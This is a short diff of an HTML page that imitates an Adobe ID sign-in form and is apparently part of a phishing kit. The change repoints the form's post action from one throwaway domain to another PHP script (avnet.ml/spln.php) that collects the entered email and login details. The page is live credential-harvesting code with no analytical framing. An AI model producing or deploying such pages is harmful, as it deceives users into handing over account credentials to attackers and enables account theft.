--- a/pai.html
+++ b/pai.html
@@ -19,7 +19,7 @@
 				<div class="idp-flow-logo-image"></div> <div class="text">Adobe ID</div>
 			</div>
 			<h1 class="page-title">Sign in</h1>
-			<form class="abode-login" action="https://876336372291.gq/spln.php" method="post">
+			<form class="abode-login" action="https://avnet.ml/spln.php" method="post">
 				<div class="inputs">
 					<div class="loader ball-beat"><div></div><div></div><div></div></div>
 					<input type="email" name="vision" id="email" placeholder="Email Adress" required="" style="border: solid 1px red;">
